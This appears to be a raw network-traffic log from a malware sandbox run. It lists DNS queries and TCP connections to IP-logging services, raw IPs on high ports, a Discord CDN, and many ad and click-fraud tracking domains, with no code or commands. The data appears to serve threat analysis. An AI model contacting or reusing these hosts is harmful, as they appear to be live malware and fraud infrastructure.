US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
N/A 127.0.0.1:49239 tcp
N/A 127.0.0.1:49241 tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 crl.comodoca.com udp
US 151.139.128.14:80 crl.comodoca.com tcp
US 172.67.211.161:443 startupmart.bar tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 151.139.128.14:80 crl.usertrust.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 172.67.136.53:443 wheelllc.bar tcp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 phonefix.bar udp
US 172.67.131.66:443 phonefix.bar tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 annual-gamers-choice.com udp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 8.8.8.8:53 google.com udp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 104.21.15.97:443 annual-gamers-choice.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 162.0.210.44:443 connectini.net tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 104.21.33.188:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 varmisende.com udp
KR 180.69.193.102:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
SC 185.215.113.29:8678 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
NL 146.70.35.170:30905 tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 securebiz.org udp
KR 106.241.4.103:80 securebiz.org tcp
US 172.67.75.172:443 api.ip.sb tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
UA 77.123.139.190:443 api.2ip.ua tcp
KR 175.120.254.9:80 fernandomayol.com tcp
KR 175.120.254.9:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
US 8.8.8.8:53 tbpws.top udp
KR 106.241.4.103:80 securebiz.org tcp
MD 5.181.156.77:80 5.181.156.77 tcp
KR 175.120.254.9:80 tbpws.top tcp
MX 201.124.70.40:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
MX 201.124.70.40:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
KR 175.120.254.9:80 tbpws.top tcp
DE 162.55.179.90:80 162.55.179.90 tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
KR 175.120.254.9:80 tbpws.top tcp
DE 144.76.183.53:63565 tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 172.67.75.172:443 api.ip.sb tcp
KR 175.120.254.9:80 tbpws.top tcp
US 162.0.220.187:80 requestimmersive.com tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
KR 175.120.254.9:80 tbpws.top tcp
DE 162.55.179.90:80 162.55.179.90 tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
KR 175.120.254.9:80 tbpws.top tcp
MY 103.169.90.205:80 103.169.90.205 tcp
KR 175.120.254.9:80 tbpws.top tcp
DE 195.201.225.248:443 telete.in tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 r.inewyearsale.info udp
US 172.67.198.181:80 r.inewyearsale.info tcp
US 172.67.198.181:80 r.inewyearsale.info tcp
US 8.8.8.8:53 u-5483.onetouch7.info udp
US 172.67.128.189:80 u-5483.onetouch7.info tcp
US 172.67.128.189:80 u-5483.onetouch7.info tcp
US 8.8.8.8:53 rotabol.com udp
US 162.252.21.19:443 rotabol.com tcp
US 162.252.21.19:443 rotabol.com tcp
US 8.8.8.8:53 trafficdeliveryclick.xyz udp
RU 188.225.75.54:443 trafficdeliveryclick.xyz tcp
RU 188.225.75.54:443 trafficdeliveryclick.xyz tcp
US 8.8.8.8:53 alltomag.xyz udp
RU 185.230.140.210:80 alltomag.xyz tcp
RU 185.230.140.210:80 alltomag.xyz tcp
US 8.8.8.8:53 nawa-store.com udp
RU 188.225.75.54:443 nawa-store.com tcp
RU 188.225.75.54:443 nawa-store.com tcp
NL 188.227.85.21:80 188.227.85.21 tcp
NL 188.227.85.21:80 tcp
NL 188.227.85.21:80 188.227.85.21 tcp
NL 188.227.85.21:80 tcp
NL 188.227.85.21:80 188.227.85.21 tcp
NL 188.227.85.21:80 188.227.85.21 tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 api.bdisl.com udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 www.trafficmob.net udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 134.209.213.188:32328 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.22.6.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 134.209.221.29:50753 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 134.209.71.182:43781 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 134.209.120.191:41248 tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.6.191:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 view.adjust.com udp
SG 172.104.40.4:80 offersix.info tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
